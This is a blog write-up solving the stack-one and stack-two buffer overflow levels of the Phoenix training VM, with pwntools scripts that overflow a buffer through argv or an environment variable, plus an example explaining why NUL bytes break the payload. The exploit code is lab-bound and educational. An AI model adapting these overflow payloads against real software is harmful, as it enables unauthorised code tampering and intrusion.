# [pwn notes 1] stack-one and stack-two (Phoenix)

**Published by:** [BuringStraw](https://paragraph.com/@buringstraw/)
**Published on:** 2023-03-24
**URL:** https://paragraph.com/@buringstraw/pwn-1-stack-one-stack-two-phoenix

## Content

These two levels are very simple, and the only difference between them is how the data is read in. They are the same as stack-zero, except that the overwritten data has to be a specific value.

### stack-one

stack-one `strcpy`s the program's first argument into the buffer. In gdb, put the argument directly after `run` to pass it to the program.

pwntools' `sh.run` can take a byte string as its argument, and that string can include the program's launch arguments. (Looking at the docs, the `run` method is marked "Backward compatibility. Use system()".)

```python
from pwn import *

# SSH into the Phoenix VM (default exploit.education credentials)
shell = ssh("user", "localhost", password="user", port=2222)

# 0x40 bytes of padding to reach the target variable, then the
# required 32-bit value in little-endian order
s = b"a" * 0x40 + p32(0x496c5962)

# Pass the payload as argv[1] by appending it to the command line
sh = shell.run(b"/opt/phoenix/amd64/stack-one " + s)
print(sh.recvlines(2))
```

### stack-two

This time the data is written into an environment variable. At this point I found that writing "\0" into an environment variable causes problems: the value we need to write is 32-bit, so `p64` must not be used; it automatically pads with zero bytes and then an error is raised.

```python
from pwn import *

shell = ssh("user", "localhost", password="user", port=2222)

# Same 0x40 bytes of padding, then the required 32-bit value.
# p32, not p64: p64 would append NUL bytes, which cannot appear
# in an environment variable.
s = b"a" * 0x40 + p32(0x0d0a090a)
print(s)

# env values must be str, so decode the payload (no NUL bytes here)
s = s.decode()
print(s)

# Pass the payload through the environment variable the level reads
sh = shell.run(b"/opt/phoenix/amd64/stack-two", env={"ExploitEducation": s})
print(sh.recvlines(2))
```
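The point about `p64` above, as an added example that is not part of the original post: it uses `struct` instead of pwntools so it runs without the library, and it shows why an environment variable is a poor carrier for a 64-bit packed value. Environment variables are C strings, so a NUL byte terminates them, and Python refuses to set a value containing one at all. The value and padding are the ones from the post; the variable name `EXAMPLE_VAR` is a placeholder chosen here.

```python
import os
import struct

# Constructed from the post's stack-two payload: 0x40 bytes of padding
# followed by the 32-bit value the level expects.
TARGET = 0x0d0a090a
PADDING = b"a" * 0x40


def p32(value: int) -> bytes:
    """Little-endian 32-bit packing, same layout as pwntools p32()."""
    return struct.pack("<I", value)


def p64(value: int) -> bytes:
    """Little-endian 64-bit packing, same layout as pwntools p64().
    For a value that fits in 32 bits the top four bytes are NUL."""
    return struct.pack("<Q", value)


def as_c_string(data: bytes) -> bytes:
    """What a C program sees when it reads the variable with getenv():
    everything up to (not including) the first NUL byte."""
    return data.split(b"\x00", 1)[0]


def env_accepts(name: str, value: bytes) -> bool:
    """Try to place the raw bytes into this process's environment.

    Python's os.environ rejects values with an embedded NUL byte by raising
    ValueError, which is the error the post ran into when using p64.
    """
    try:
        os.environ[name] = value.decode("latin-1")  # byte-preserving decode
    except ValueError:
        return False
    finally:
        os.environ.pop(name, None)  # never leave the test value behind
    return True


if __name__ == "__main__":
    good = PADDING + p32(TARGET)
    bad = PADDING + p64(TARGET)
    print("p32 payload accepted:", env_accepts("EXAMPLE_VAR", good))
    print("p64 payload accepted:", env_accepts("EXAMPLE_VAR", bad))
    # Even if the NUL bytes were not rejected, the C side would only see
    # the bytes before the first NUL, i.e. exactly the p32 payload.
    print("p64 payload as seen by C:", as_c_string(bad) == good)
```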